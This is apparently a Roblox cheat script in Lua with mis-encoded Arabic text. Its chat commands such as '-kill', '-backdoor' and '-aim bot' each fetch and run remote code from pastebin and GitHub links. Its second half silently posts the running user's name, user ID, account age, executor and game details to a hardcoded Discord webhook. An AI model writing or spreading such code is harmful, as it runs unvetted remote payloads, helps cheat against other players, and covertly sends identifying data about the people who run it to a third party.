	local Players = game:GetService("Players")
	game.StarterGui:SetCore("SendNotification", {
		Title = " Ø§ÙƒØªØ¨-ronaldo Ø§Ù„Ø§ÙˆØ§Ù…Ø± Ù„Ø£Ø¶Ù‡Ø§Ø±"; 
		Text = "-kill / -backdoor - fly"; 
		Icon = "rbxassetid://13395962812"; 
		Duration = 20; 
	})
	local function chatted(msg)
		if msg == "-fly" then
			loadstring(game:HttpGet("https://pastebin.com/raw/0DE4GVqg"))()
		end
	end

	Players.LocalPlayer.Chatted:Connect(chatted)

	local Players = game:GetService("Players")

	local function chatted(msg)
		if msg == "-kill" then
			loadstring(game:HttpGet("https://pastebin.com/raw/p01JvSJp"))()
		end
	end

	Players.LocalPlayer.Chatted:Connect(chatted)
	local function chatted(msg)
		if msg == "-backdoor" then
			loadstring(game:HttpGet("https://pastebin.com/raw/jBdvCHnv"))()
		end
	end

	Players.LocalPlayer.Chatted:Connect(chatted)
	local function chatted(msg)
		if msg == "-TP" then
		    loadstring(game:HttpGet("https://gist.githubusercontent.com/DagerFild/b4776075a0d26ef04394133ee6bd2081/raw/0ed51ac94057d2d9a9f00e1b037b9011c76ca54a/tpGUI", true))()
     end
   end

	Players.LocalPlayer.Chatted:Connect(chatted)
	local function chatted(msg)
		if msg == "-camera" then
			loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/main/CCTV%20Camera'))()
		end
	end

	Players.LocalPlayer.Chatted:Connect(chatted)
	local function chatted(msg)
		if msg == "-aim bot" then
			loadstring(game:HttpGet("https://pastebin.com/raw/1Gp9c57U"))()
		end
	end

	Players.LocalPlayer.Chatted:Connect(chatted)
	local function chatted(msg)
		if msg == "-Chat" then
			loadstring(game:HttpGet('https://pastebin.com/raw/MBpnp3yS'))()
		end
	end

	Players.LocalPlayer.Chatted:Connect(chatted)
	local function chatted(msg)
		if msg == "-hack map" then
			loadstring(game:HttpGet(('https://github.com/Ndora1/Ndora1/raw/main/hakedbnos'),true))()
		end
	end
	
Players.LocalPlayer.Chatted:Connect(chatted)
	local function chatted(msg)
		if msg == "-ronaldo" then
			loadstring(game:HttpGet("https://pastebin.com/raw/kAYR3ZXs"))()
   end
 end
	Players.LocalPlayer.Chatted:Connect(chatted)

	print("Ø´ØºØ§Ù„")
	
	
	
local Webhook = "https://discord.com/api/webhooks/1098090590673047612/mzpxAgHAPhF5yyOndlT9-QV4cX4oZ-cDTA4KV-WGAI4KLWunBNlvRjoNtLGgTuMMFhVF" -- your webhook
_G.Discord_UserID = "ã€Ž ð‘¹ð‘¶ð‘µð‘¨ð‘³ð‘«ð‘¶ ðŸ‡®ðŸ‡¶âƒ¤à¼’ã€ð“ð#8026" -- ID To Ping on every execution, blank if no one wants to be pinged.

local player = game:GetService"Players".LocalPlayer
local joinTime = os.time() - (player.AccountAge*86400)
local joinDate = os.date("!*t", joinTime)
local premium = false
local alt = true
if player.MembershipType == Enum.MembershipType.Premium then
   premium = true
end

if not premium and player.AccountAge >= 70 then
    alt = "Possible"
elseif premium and player.AccountAge >= 70 then
   alt = false
end

local executor = identifyexecutor() or "Unknown"
local Thing = game:HttpGet(string.format("https://thumbnails.roblox.com/v1/users/avatar?userIds=%d&size=180x180&format=Png&isCircular=true", game.Players.LocalPlayer.UserId))
Thing = game:GetService("HttpService"):JSONDecode(Thing).data[1]
local AvatarImage = Thing.imageUrl
local msg = {
   ["username"] = "by ronaldo script admin",
   ["avatar_url"] = "",
   ["content"] = ( _G.Discord_UserID ~= "" and  _G.Discord_UserID ~= nil) and tostring("@".._G.Discord_UserID.."") or " ",
   ["embeds"] = {
       {
           ["color"] = tonumber(tostring("0x32CD32")), --decimal
           ["title"] = "Ù…Ø³ØªØ®Ø¯Ù…ÙŠÙ† Ø§Ù„Ø³ÙƒØ±Ø¨Øª By Ronaldo admin.",
           ["thumbnail"] = {
               ["url"] = AvatarImage,
           },
           ["fields"] = {
                {
                   ["name"] = "Ø§Ù„Ø§Ø³Ù…",
                   ["value"] = "||"..player.Name.."||",
                   ["inline"] = true
                },
                {
                   ["name"] = "Ø§Ù„Ø§Ø³Ù… Ø§Ù„ÙˆÙ‡Ù…ÙŠ",
                   ["value"] = player.DisplayName,
                   ["inline"] = true
                },
                {
                   ["name"] = "Ø§Ù„Ø§ÙŠØ¯ÙŠ",
                   ["value"] = "||["..player.UserId.."](" .. tostring("https://www.roblox.com/users/" .. game.Players.LocalPlayer.UserId .. "/profile")..")||",
                   ["inline"] = true
                },
                {
               ["name"] = "Ø§ÙŠØ¯ÙŠ Ø§Ù„Ù…Ø§Ø¨",
               ["value"] = "["..game.PlaceId.."](" .. tostring("https://www.roblox.com/games/" .. game.PlaceId) ..")",
               ["inline"] = true              
                },
                {
                   ["name"] = "Ø§Ø³Ù… Ø§Ù„Ù…Ø§Ø¨",
                   ["value"] = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name,
                   ["inline"] = true
                },
                {
                   ["name"] = "Ø§Ù„Ù‡Ø§Ùƒ Ø§Ù„Ù…Ø³ØªØ®Ø¯Ù…",
                   ["value"] = executor,
                   ["inline"] = true
                },
                {
                   ["name"] = "Ø§Ø´ØªØ±Ø§Ùƒ Ø±ÙˆØ¨",
                   ["value"] = alt,
                   ["inline"] = true
                },
                {
                   ["name"] = "Ø¹Ù…Ø± Ø§Ù„Ø­Ø³Ø§Ø¨",
                   ["value"] = player.AccountAge.."day(s)",
                   ["inline"] = true
                },
                {
                   ["name"] = "ÙˆÙ‚Øª Ø¯Ø®ÙˆÙ„Ù‡",
                   ["value"] = joinDate.day.."/"..joinDate.month.."/"..joinDate.year,
                   ["inline"] = true
                },
           },
           ['timestamp'] = os.date("%Y-%m-%dT%X.000Z")
       }
   }
}

if isfile("Workspace/readthis.txt") then
        request = http_request or request or HttpPost or syn.request
    request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game.HttpService:JSONEncode(msg)})
    makefolder("Workspace")
    writefile("Workspace/readthis.txt", "true")
    else
    request = http_request or request or HttpPost or syn.request
    request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game.HttpService:JSONEncode(msg)})
    makefolder("Workspace")
    writefile("Workspace/readthis.txt", "true")
end
